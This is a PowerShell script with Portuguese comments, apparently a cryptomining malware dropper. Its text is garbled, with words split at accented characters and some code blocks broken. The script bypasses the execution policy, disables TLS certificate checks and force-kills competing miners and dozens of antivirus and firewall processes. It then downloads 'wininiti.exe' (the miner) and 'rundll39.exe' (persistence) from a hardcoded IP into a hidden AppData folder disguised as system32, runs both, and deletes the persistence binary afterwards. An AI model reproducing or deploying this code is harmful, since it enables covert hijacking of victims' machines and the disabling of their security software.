# Verificar a vers
o do PowerShell
$psVersion = $PSVersionTable.PSVersion.Major
# Definir a pol
tica de execu
o para o processo atual
if ($psVersion -ge 3) {
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
} else {
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Unrestricted -Force
} catch {
Write-Output "Falha ao definir pol
tica de execu
o. Verifique permiss
# Desativar a valida
o de certificado SSL/TLS
if ($psVersion -ge 3) {
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
} else {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
} catch {
Write-Output "Erro ao desativar valida
o de certificado SSL/TLS."
# Lista de processos a serem terminados
$processList = @("ksoftriqd","network0*","kthreaddi]","kthreaddi","kthreaddk","sysrv","c3pool","kthreaddk","dbused","kthreaddi","kdevtmpfsi","kinsing","gitlabw","monero","kthreaddw","ARestore","asOELnch","buVss","cltLMH","cltRT","coInst","coNatHst","CpySnpt","EFAInst64","elaminst","FLDgHost","InstCA","MCUI32","Navw32","ncolow","NortonSecurity","NSc","nsWscSvc","nuPerfScan","RuleUp","SEFInst","Sevntx64","SRTSP_CA","SymDgnHC","symerr","SymVTCatalogDB","tuIH","uiStub","uiWNSNotificationApp","Upgrade","vpnCA","wa_3rd_party_host_32","wa_3rd_party_host_64","WFPUnins","wpInstCA","WSCStub","MCODS","MCSHIELD","msmpeng","navapsvc","avkwctl","fsav32","mcshield","ntrtscan","avguard","ashServ","AVENGINE","avgemc","tmntsrv","efpeadm","VPNGUI","CVPND","IPSECLOG","cfp","fsdfwd","fsguiexe","blackd","kpf4gui","MSSCLL","MCSHELL","MPFSERVICE","MPFAGENT","nisum","smc","persfw","pccpfw","WINSS","ZLCLIENT","kavfswp","kavtray","kavfsmui","kavshell","kavfsrcn","kavfs","kavfsgt","kavfswh","kavfsscs","afwServ","aswEngSrv","aswidsagent"
Write-Host "Checking for processes to terminate..."
# Obter todos os processos em execu
if ($psVersion -ge 3) {
$allProcesses = Get-Process
} else {
$allProcesses = Get-Process -ErrorAction SilentlyContinue
# Iterar sobre todos os processos e terminar os processos na lista
foreach ($process in $allProcesses) {
if ($processList -contains $process.ProcessName) {
try {
Stop-Process -Id $process.Id -Force
Write-Host "Processo $($process.ProcessName) com ID $($process.Id) finalizado."
} catch {
Write-Host "Falha ao finalizar $($process.ProcessName)."
}
}
} catch {
Write-Output "Erro ao verificar ou finalizar processos maliciosos."
# URL dos arquivos
$URL = "http://107.173.154.7:9999/installer"
o para baixar arquivos com fallback para WebClient e bitsadmin
function Download-File {
param([string]$url, [string]$output)
# Tentar com Invoke-WebRequest
if (Get-Command -Name Invoke-WebRequest -ErrorAction SilentlyContinue) {
try {
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction Stop
Write-Output "Download conclu
do com Invoke-WebRequest."
return
} catch {
Write-Output "Invoke-WebRequest falhou, tentando WebClient..."
}
# Fallback para WebClient
try {
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($url, $output)
Write-Output "Download conclu
do com WebClient."
return
} catch {
Write-Output "WebClient falhou, tentando bitsadmin..."
# Fallback final para bitsadmin
try {
Start-Process -FilePath "bitsadmin" -ArgumentList "/transfer myDownloadJob /download /priority foreground `"$url`" `"$output`"" -NoNewWindow -Wait
Write-Output "Download conclu
do com bitsadmin."
} catch {
Write-Output "bitsadmin falhou. N
o foi poss
vel baixar o arquivo."
# Verificar se o processo "wininiti" est
em execu
o e encerrar inst
ncias duplicadas
if ($psVersion -ge 3) {
$wininitiProcesses = Get-Process | Where-Object { $_.ProcessName -eq "wininiti" }
} else {
$wininitiProcesses = Get-WmiObject Win32_Process | Where-Object { $_.Name -eq "wininiti.exe" }
$COUNT = $wininitiProcesses.Count
if ($COUNT -gt 1) {
Write-Output "Killing duplicate process..."
$wininitiProcesses | Sort-Object StartTime -Descending | Select-Object -Skip 1 | ForEach-Object {
try {
if ($psVersion -ge 3) {
Stop-Process -Id $_.Id -Force
} else {
$_.Terminate()
}
Write-Output "Duplicate process ID $($_.Id) closed."
} catch {
Write-Output "Erro ao finalizar processo duplicado."
}
}
Write-Output "Running."
exit 0
} elseif ($COUNT -eq 1) {
Write-Output "Running."
exit 0
} else {
Write-Output "..."
} catch {
Write-Output "Erro ao verificar inst
ncias do processo wininiti."
# Criar o diret
rio de destino
$folderPath = Join-Path -Path $env:USERPROFILE -ChildPath "AppData\\Local\\Microsoft\\Windows\\Hidden\\system32"
if (Test-Path $folderPath) {
Remove-Item -Path $folderPath -Recurse -Force -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Path $folderPath -Force | Out-Null
} catch {
Write-Output "Erro ao configurar o diret
rio para o download dos arquivos."
# Baixar os arquivos necess
Download-File "$URL/wininiti" "$folderPath\\wininiti.exe"
Download-File "$URL/rundll39" "$folderPath\\rundll39.exe"
} catch {
Write-Output "Erro ao baixar os arquivos. Verifique a URL e a conex
# Executar o minerador e bin
rio de persist
ncia com fallback
if ($psVersion -ge 2) {
Start-Process -FilePath "$folderPath\\wininiti.exe" -NoNewWindow
} else {
& "$folderPath\\wininiti.exe"
Start-Sleep -Seconds 3
if ($psVersion -ge 2) {
Start-Process -FilePath "$folderPath\\rundll39.exe" -NoNewWindow
} else {
& "$folderPath\\rundll39.exe"
# Excluir o arquivo rundll39.exe ap
s sua execu
Start-Sleep -Seconds 9
if (Test-Path "$folderPath\\rundll39.exe") {
Remove-Item -Path "$folderPath\\rundll39.exe" -Force -ErrorAction SilentlyContinue
Write-Output "Arquivo rundll39.exe removido ap
s execu
} catch {
Write-Output "Erro ao iniciar o minerador ou ao remover o bin
rio rundll39. Verifique permiss
es e configura